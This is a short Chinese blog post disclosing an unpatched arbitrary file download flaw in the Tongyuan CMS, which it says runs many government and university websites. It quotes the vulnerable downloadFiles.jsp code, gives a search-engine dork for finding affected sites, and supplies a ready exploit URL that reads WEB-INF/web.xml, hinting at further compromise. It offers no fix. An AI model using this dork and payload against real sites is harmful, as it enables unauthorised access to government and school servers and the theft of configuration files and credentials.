通元建站系统存在任意下载0day
这个系统搭建的站都是些大型的政府站和清华北大等高等学校的网站 所以研究了下 首先看了漏洞页面
cms\web\downloadFiles.jsp
分析了下源代码
String file = request.getParameter("file");
//file = file.replace("/","\\");
String filename = file.substring(file.lastIndexOf("/")+1);
String extname = filename.substring(filename.lastIndexOf(".")+1).trim().toLowerCase();
//获得文件的扩展名
response.setContentType((String)typeMap.get(extname));
response.setHeader("Content-Disposition","attachment;filename="+filename);
//读入文件内容,生成新的文件
FileInputStream in = new FileInputStream(file);
byte[] buf = new byte[4096];
ServletOutputStream output = response.getOutputStream();
int length;
while ( (in != null) && ( (length = in.read(buf)) != -1)) {
output.write(buf, 0, buf.length);
可任意下载网站的任意软件 找到这个点那么后面的就简单了
找网站的绝对路径 百度 或者谷歌关键字:inurl:downloadFiles.jsp
出来了很多文档 把鼠标放在这些链接上面 大部分网站的绝对路径就出来了
然后找默认路径下载 例如:
http://www.XXXX.cn/cms/web/downloadFiles.jsp?file=/home/gpower/webapps/cms/WEB-INF/web.xml
其余的 不用我多说了吧 很多站就是用的这个系统
原创文章转载请注明:转载自 七行者博客
本文固定链接: https://www.qxzxp.com/4561.html